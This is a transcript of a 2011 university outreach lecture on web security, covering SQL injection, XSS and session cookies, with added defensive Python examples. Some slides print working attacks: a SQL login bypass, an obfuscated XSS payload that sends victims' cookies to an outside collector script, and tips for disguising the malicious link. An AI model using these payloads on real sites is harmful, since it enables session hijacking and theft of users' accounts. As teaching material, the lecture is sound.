
National Central University Computer Center, "Multimedia and Web Applications" IT Outreach Course


Presentation Transcript


  1. National Central University Computer Center, "Multimedia and Web Applications" IT Outreach Course • An Introduction to Web Application Security. Date: 2011/03/27. Lecturer: 張竟, third-year Computer Science undergraduate, cwebb [dot] tw [at] gmail [dot] com

  2. Agenda • Banter • OWASP Top 10 • SQL injection • XSS • cookie & session

  3. Agenda • Banter • OWASP Top 10 • SQL injection • XSS • cookie & session

  4. Don't do bad things!

  5. Don't get caught!

  6. Don't get caught!

  7. Don't say I taught you

  8. Agenda • Banter • OWASP Top 10 • SQL injection • XSS • cookie & session

  9. Web security? • Early days vs. today • Static vs. dynamic • Where there is code, there are vulnerabilities!

  10. Ways to attack • the OS • the web server • the web application

  11. Attack scenarios • attack the web server: gain privileges, steal information, then attack its users • attack other users: steal information, carry out further attacks • attacks may be composites of these

  12. Agenda • Banter • OWASP Top 10 • SQL injection • XSS • cookie & session


  14. OWASP Top 10 - 2010 • A1: Injection • A2: Cross-Site Scripting (XSS) • A3: Broken Authentication and Session Management • A4: Insecure Direct Object References • A5: Cross-Site Request Forgery (CSRF)

  15. OWASP Top 10 - 2010 • A6: Security Misconfiguration • A7: Insecure Cryptographic Storage • A8: Failure to Restrict URL Access • A9: Insufficient Transport Layer Protection • A10: Unvalidated Redirects and Forwards


  18. Agenda • Banter • OWASP Top 10 • SQL injection • XSS • cookie & session

  19. Injections • the hacker's fill-in-the-blanks game • where can an attacker inject? databases (MySQL, MS SQL, PostgreSQL ...), NoSQL stores, directory services (LDAP), system commands!!

  20. How SQL works in a web app • a login page, for example: the client sends a request with id and pwd to the web server; the web server runs select * from account where `id`=id and `pwd`=pwd on the SQL server; the SQL server returns the result; the web server returns login success/failed to the client

  21. Why SQL? • widely used • stores large amounts of site data • injection friendly

  22. How do injections work? • MySQL as the example • $query = "select * from account where `id`='$id' and `pwd`='$pwd'"; with $id = ' or 1=1 -- the query becomes select * from account where `id`='' or 1=1 -- ... and everything after the comment marker is ignored

  23. Attack techniques • UNION-based • blind injection

  24. Impact • data stolen / modified • gaining privileges on the site • the whole site taken over

  25. How to defend • use safe APIs • filter and escape special characters • never concatenate user input directly into the query • use a scanner to find vulnerabilities
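As an added example (not part of the original slides, which use PHP), here is the login query from slides 20, 22 and 25 written in Python against an in-memory SQLite table, once the way the slide builds it (string concatenation) and once with a parameterized query, the "safe API" the defense slide recommends. The `account` table and its two rows are constructed sample data; the payload is the slide's own `' or 1=1 --`.

```python
import sqlite3


def make_db():
    """Constructed sample data: a two-row account table in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE account (id TEXT, pwd TEXT)")
    conn.executemany(
        "INSERT INTO account VALUES (?, ?)",
        [("alice", "correct horse"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn, user_id, pwd):
    """The slide's pattern: user input is spliced straight into the SQL text.
    With user_id = "' or 1=1 -- " the WHERE clause becomes
    `id`='' or 1=1 -- ' and `pwd`='...'   (everything after -- is a comment),
    so every row matches and the login 'succeeds' without a valid password."""
    query = f"select * from account where `id`='{user_id}' and `pwd`='{pwd}'"
    rows = conn.execute(query).fetchall()
    return len(rows) > 0


def login_safe(conn, user_id, pwd):
    """Parameterized query: the SQL text is fixed and the values travel separately,
    so quotes and comment markers in the input are compared as data, never parsed."""
    rows = conn.execute(
        "select * from account where id = ? and pwd = ?", (user_id, pwd)
    ).fetchall()
    return len(rows) > 0


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 -- "
    print("vulnerable, injected:", login_vulnerable(db, payload, "x"))  # True
    print("safe, injected:     ", login_safe(db, payload, "x"))        # False
```

Escaping quotes by hand (the slide's "filter and escape special characters") can work, but it has to be done correctly for every call site and every database dialect; a parameterized query removes the problem at its root, which is why the "safe API" bullet comes first. Password storage is out of scope here: a real system would compare a password hash, not the plaintext column.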

  26. Practice

  27. Agenda • Banter • OWASP Top 10 • SQL injection • XSS • cookie & session

  28. XSS • Cross-Site Scripting • running your own code on someone else's website!

  29. Background knowledge • HTTP GET • HTTP POST

  30. How to attack • attacks via POST/GET • the "scripting" • on the server • strange URLs

  31. How to attack • JavaScript • <iframe> / <image>

  32. Example (a page that echoes the id parameter unescaped)
    <body> <?php echo "Hello " . $_GET['id']; ?> </body>
    http://goodsite.com/?id=<script>alert("i'm Orange")</script>

  33. What may happen? • you get taken to a bad site • your information is sent to the attacker • just for fun!

  34. Just For Fun: Samy • the MySpace XSS attack • Samy is my hero! • infection

  35. Big sites are XSSable too • MySpace • Facebook • Twitter • Plurk • ...

  36. How to defend • for the server • escape what needs escaping • use a scanner to find vulnerabilities • for the user • be alert when you see strange links • browser / antivirus software
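An added example, not from the slides, covering slide 32's echo page and slide 36's "escape what needs escaping" in Python (the slide's own snippet is PHP): the parameter is pulled from the slide's URL the way `$_GET['id']` would, rendered once unescaped and once through `html.escape`, so you can see the output encoding turn the payload into inert text. The URL and payload are the slide's; the function names are mine.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The URL from slide 32 (a demonstration payload, used here only as test input).
PAYLOAD_URL = 'http://goodsite.com/?id=<script>alert("i\'m Orange")</script>'


def get_param(url, name):
    """Read one query parameter from a URL, like $_GET[name] in PHP."""
    params = parse_qs(urlsplit(url).query)
    return params.get(name, [""])[0]


def render_vulnerable(user_id):
    """Mirrors slide 32: the parameter is written into the HTML body unchanged,
    so a <script> in the parameter is parsed as markup and executed."""
    return f"<body>Hello {user_id}</body>"


def render_safe(user_id):
    """Output encoding for an HTML text context: &, <, >, " and ' become entities.
    The browser displays the characters and never sees a tag to execute."""
    return f"<body>Hello {html.escape(user_id, quote=True)}</body>"


def contains_script_tag(page):
    """Crude check used only to show the difference between the two renderings."""
    return "<script" in page.lower()


if __name__ == "__main__":
    pid = get_param(PAYLOAD_URL, "id")
    print(render_vulnerable(pid))  # the <script> survives
    print(render_safe(pid))        # &lt;script&gt;... is just text
```

Escaping has to match the context the value lands in: `html.escape` is right for text between tags and for quoted attribute values, but a value placed inside a JavaScript block or a URL needs that context's encoding instead. A Content-Security-Policy header is a useful second layer, but it does not replace encoding the output.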

  37. Practice

  38. Agenda • Banter • OWASP Top 10 • SQL injection • XSS • cookie & session

  39. Background knowledge • cookie • session. A cookie is a piece of text stored by a user's web browser. A cookie can be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing text data. The session information is stored on the web server using the session identifier (session ID) generated as a result of the first (sometimes the first authenticated) request from the end user running a web browser. The "storage" of session IDs and the associated session data (user name, account number, etc.) on the web server is accomplished using a variety of techniques including, but not limited to: local memory, flat files, and databases.


  42. If you steal the cookie, you can....

  43. How to steal it?


  45. Send the cookie to the cloud! • use GET / POST to make the page send the cookie away • <img> / <iframe>, e.g.: ["<img src='http://in1.ncu.cc/~975002063/keke/t.php?t=",document.cookie," >"].join() • the server side is simple: just keep the cookie

  46. Who would be dumb enough to click a link like this? http://example.com/?samname=%22%3E%3Cscript%3Edocument.write%28[String.fromCharCode%2860,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,105,110,49,46,110,99,117,46,99,99,47,126,57,55,53,48,48,50,48,54,51,47,107,101,107,101,47,116,46,112,104,112,63,116,61,34%29,document.cookie,String.fromCharCode%2834,39,62%29].join%28%29%29;%3C/script%3E%3C%22

  47. Hiding it • there are URL shorteners (tinyurl.com / 0rz.tw / goo.gl / bit.ly) • embed it in another page (e.g. an iframe with width and height set to 0 or 1) • ugly URLs are EVERYWHERE, so one more does not stand out: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1eic6yu9oa4y3&scc=1&ltmpl=default&ltmplcache=2 https://login.yahoo.com/config/login?.intl=tw&.pd=c%3d7pP3Kh2p2e4XklntZWWfDLAC8w--&.done=https://tw.login.yahoo.com/cgi-bin/kcookie.cgi/www/http%3a//tw.yahoo.com&rl=1

  48. Defenses • lock the session to the user agent / headers • bind it to the IP • *don't get attacked successfully in the first place*

  49. Locking the session to the user agent / headers
    if (isset($_SESSION['HTTP_USER_AGENT'])) {
        if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) {
            exit();
        }
    } else {
        $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
    }
    But... if someone can steal your cookie, can't they get your headers too?
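An added example, not from the slides (whose code is PHP), showing slide 48 and 49 together in Python: a small in-memory session store that applies the slide's User-Agent binding check, a `Set-Cookie` builder that adds the `HttpOnly`, `Secure` and `SameSite` attributes (so `document.cookie`, the channel used on slide 45, cannot read the session id at all), and a demo that reproduces the slide's closing caveat: a thief who also copies the victim's User-Agent header passes the check. The session store, the user names and the User-Agent strings are constructed; `sha256` stands in for the slide's `md5`.

```python
import hashlib
import secrets
from http.cookies import SimpleCookie


def ua_fingerprint(user_agent):
    """Hash of the User-Agent header (sha256 here, where the slide used md5)."""
    return hashlib.sha256(user_agent.encode("utf-8")).hexdigest()


class SessionStore:
    """Server-side session table keyed by an unguessable session id (constructed, in-memory)."""

    def __init__(self):
        self._sessions = {}

    def create(self, user, user_agent):
        sid = secrets.token_urlsafe(32)  # 256 bits of randomness: cannot be guessed
        self._sessions[sid] = {"user": user, "ua_hash": ua_fingerprint(user_agent)}
        return sid

    def lookup(self, sid, user_agent):
        """Slide 49's check: the session is honoured only while the User-Agent still
        matches the one recorded at login; a mismatch is treated as hijacking and
        destroys the session. Returns the user name, or None."""
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        if not secrets.compare_digest(sess["ua_hash"], ua_fingerprint(user_agent)):
            del self._sessions[sid]
            return None
        return sess["user"]


def set_cookie_header(sid):
    """Build the Set-Cookie value for the session id. HttpOnly keeps it out of
    document.cookie, so an injected <img src=...?t=document.cookie> sees nothing;
    Secure keeps it off plaintext HTTP; SameSite=Lax stops most cross-site sends."""
    cookie = SimpleCookie()
    cookie["sid"] = sid
    cookie["sid"]["httponly"] = True
    cookie["sid"]["secure"] = True
    cookie["sid"]["samesite"] = "Lax"
    cookie["sid"]["path"] = "/"
    return cookie.output(header="").strip()


def hijack_check_demo():
    """Both halves of slide 49: a changed User-Agent is caught, but a request that
    replays the stolen id together with the victim's own User-Agent is not."""
    store = SessionStore()
    victim_ua = "Mozilla/5.0 (constructed victim browser)"
    sid = store.create("alice", victim_ua)
    return {
        "owner": store.lookup(sid, victim_ua),                         # "alice"
        "replay_with_copied_ua": store.lookup(sid, victim_ua),         # "alice": check bypassed
        "replay_with_other_ua": store.lookup(sid, "curl/7.0 (constructed)"),  # None: caught
    }


if __name__ == "__main__":
    print(set_cookie_header("constructed-session-id"))
    print(hijack_check_demo())
```

The User-Agent check only raises the bar for a careless thief; the header is public and trivially copied, which is the slide's point. The attributes in `set_cookie_header` address the root cause instead: if the script injected through XSS cannot read the cookie, there is nothing to send to the "cloud" in the first place, and escaping output (slide 36) keeps the script from being injected at all.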

  50. Practice
